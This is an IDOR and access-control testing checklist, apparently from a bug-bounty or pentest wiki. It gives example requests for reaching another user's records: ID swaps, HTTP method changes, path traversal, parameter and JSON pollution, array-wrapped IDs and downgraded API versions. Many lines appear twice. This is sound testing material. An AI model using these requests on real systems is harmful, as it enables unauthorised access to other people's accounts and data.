Account Setup: Create two accounts or enumerate users first.
Endpoint Check: Determine if the endpoint is private or public and if it contains any ID parameter.
Parameter Manipulation: Change the parameter value to another user's ID and observe any changes to their account.
Done!
Profile Actions: Check actions like image profile, account deletion, account information, API key management, comment reading, price changes, and currency conversions (e.g., dollar to euro).
ID Decoding: If the ID is encoded (e.g., MD5, base64), try decoding it.
Example: GET /GetUser/dmljdGltQG1haWwuY29t
GET /GetUser/dmljdGltQG1haWwuY29t
HTTP Method Change: Test different HTTP methods.
Example:
GET /users/delete/victim_id → 403
GET /users/delete/victim_id
POST /users/delete/victim_id → 200
POST /users/delete/victim_id
Parameter Replacement: Swap parameter names.
Instead of GET /api/albums?album_id=<album id>, try GET /api/albums?account_id=<account id>.
GET /api/albums?album_id=<album id>
GET /api/albums?account_id=<account id>
Burp Extension: Use Paramalyzer to remember all parameters passed to a host.
Path Traversal:
POST /users/delete/victim_id → 403
POST /users/delete/my_id/..victim_id → 200
POST /users/delete/my_id/..victim_id
Change Request Content-Type:
Change from Content-Type: application/xml to Content-Type: application/json.
Content-Type: application/xml
Content-Type: application/json
ID Swap: Swap non-numeric IDs with numeric ones.
GET /file?id=90djbkdbkdbd29dd
GET /file?id=302.
GET /file?id=302
Function Level Access Control:
GET /admin/profile → 401
GET /admin/profile
GET /Admin/profile → 200 (and variations).
GET /Admin/profile
Wildcard Parameter:
GET /api/users/user_id →
GET /api/users/user_id
GET /api/users/*.
GET /api/users/*
Encoded/Hashed ID: Never ignore encoded/hashed IDs. Create multiple accounts to understand patterns.
Google Dorking: Search for indexed endpoints containing IDs.
Brute Force Hidden Parameters: Use tools like Arjun or ParamMiner.
Bypass Object Level Authorization: Add parameters to endpoints if not present by default.
GET /api_v1/messages → 200
GET /api_v1/messages
GET /api_v1/messages?user_id=victim_uuid → 200.
GET /api_v1/messages?user_id=victim_uuid
HTTP Parameter Pollution: Send multiple values for the same parameter.
GET /api_v1/messages?user_id=attacker_id&user_id=victim_id.
GET /api_v1/messages?user_id=attacker_id&user_id=victim_id
Change File Type:
GET /user_data/2341 → 401
GET /user_data/2341
GET /user_data/2341.json → 200 (and others).
GET /user_data/2341.json
JSON Parameter Pollution:
Example: {"userid":1234,"userid":2542}.
{"userid":1234,"userid":2542}
Wrap ID in Array:
{"userid":123} → 401
{"userid":123}
{"userid":[123]} → 200.
{"userid":[123]}
Wrap ID in JSON Object:
{"userid":{"userid":123}} → 200.
{"userid":{"userid":123}}
Outdated API Version:
GET /v3/users_data/1234 → 401
GET /v3/users_data/1234
GET /v1/users_data/1234 → 200.
GET /v1/users_data/1234
GraphQL IDOR Testing: If using GraphQL, test for IDOR.
GET /graphql
GET /graphql.php?query=
Last updated 18 days ago